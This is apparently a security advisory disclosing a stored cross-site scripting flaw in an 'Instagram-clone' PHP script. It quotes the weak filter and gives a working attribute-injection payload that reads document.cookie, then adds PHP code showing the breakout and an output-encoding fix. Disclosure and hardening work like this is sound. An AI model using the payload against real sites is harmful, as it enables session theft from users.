Instagram-clone script 2.0 - Persistent cross site scripting

2018.07.08
Credit: L0RD
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: Instagram-clone script 2.0 - Persistent cross site scripting
# Date: 2018-07-08
# Exploit Author: L0RD
# Email: borna.nematzadeh123@gmail.com
# Software Link: https://github.com/yTakkar/Instagram-clone/archive/master.zip
# Vendor Homepage: https://github.com/yTakkar/Instagram-clone
# Version: 2.0
# Tested on: Kali linux
=================================================
# POC : Persistent Cross site scripting
# vulnerable file : edit_requests.php
# vulnerable code :

if (isset($_POST['username'])) {
  $username = preg_replace("#[<> ]#i", "", $_POST['username']);
  $firstname = preg_replace("#[<> ]#i", "", $_POST['firstname']);
  $surname = preg_replace("#[<> ]#i", "", $_POST['surname']);
  $bio = preg_replace("#[<>]#i", "", $_POST['bio']);
  $instagram = preg_replace("#[<>]#i", "", $_POST['instagram']);
  $youtube = preg_replace("#[<>]#i", "", $_POST['youtube']);
  $facebook = preg_replace("#[<>]#i", "", $_POST['facebook']);
  $twitter = preg_replace("#[<>]#i", "", $_POST['twitter']);
  $website = preg_replace("#[<>]#i", "", $_POST['website']);
  $mobile = preg_replace("#[^0-9]#i", "", $_POST['mobile']);
  $tags = preg_replace("#[\s]#", "-", $_POST['tags']);
  $session = $_SESSION['id'];
  $m=$edit->saveProfileEditing($username, $firstname, $surname, $bio, $instagram, $youtube, $facebook, $twitter, $website, $mobile, $tags);
  $array = array("mssg" => $m);
  echo json_encode($array);
}

# preg_replace() function replaces "<>" with null. So we use this payload to bypass regex :
# Payload : "onmouseover=" alert(document.cookie)
=================================================
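
The weakness described above, as an added PHP example (not code from the Instagram-clone project or from the advisory author): the "#[<>]#" filter leaves double quotes intact, so a value echoed into a quoted HTML attribute can add an attribute of its own, while htmlspecialchars() with ENT_QUOTES at output time keeps it inside the value. The "bio" input markup, the two renderer functions and the simplified attribute tokenizer are assumptions made for illustration.

```php
<?php
// Added example, not Instagram-clone code. Assumption: the saved profile value
// is later echoed into a double-quoted HTML attribute (hypothetical "bio" input).

// The filter quoted in the advisory: removes only "<" and ">".
function advisory_filter(string $value): string
{
    return preg_replace("#[<>]#i", "", $value);
}

// Hypothetical renderer that echoes the stored value without encoding.
function render_raw(string $stored): string
{
    return '<input type="text" name="bio" value="' . $stored . '">';
}

// Hardened renderer: encode for the attribute context at output time.
function render_encoded(string $stored): string
{
    $flags = ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5;
    return '<input type="text" name="bio" value="'
        . htmlspecialchars($stored, $flags, 'UTF-8') . '">';
}

// Simplified attribute tokenizer (not a full HTML parser): returns the names
// of the name="value" pairs found in a tag, enough to show a quote breakout.
function attribute_names(string $tag): array
{
    preg_match_all('/([a-zA-Z-]+)\s*=\s*"[^"]*"/', $tag, $m);
    return $m[1];
}

// Payload string taken from the advisory text.
$payload = '"onmouseover=" alert(document.cookie)';
$stored  = advisory_filter($payload);

// Report whether the filter altered the value at all.
echo 'changed by filter: ', var_export($stored !== $payload, true), PHP_EOL;

foreach (['raw' => render_raw($stored), 'encoded' => render_encoded($stored)] as $label => $html) {
    $names = attribute_names($html);
    // Any on* attribute here was created by the stored value, not the template.
    $injected = preg_grep('/^on/i', $names);
    printf("%-8s %s\n  attributes: %s\n  injected handlers: %d\n",
        $label, $html, implode(', ', $names), count($injected));
}
```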

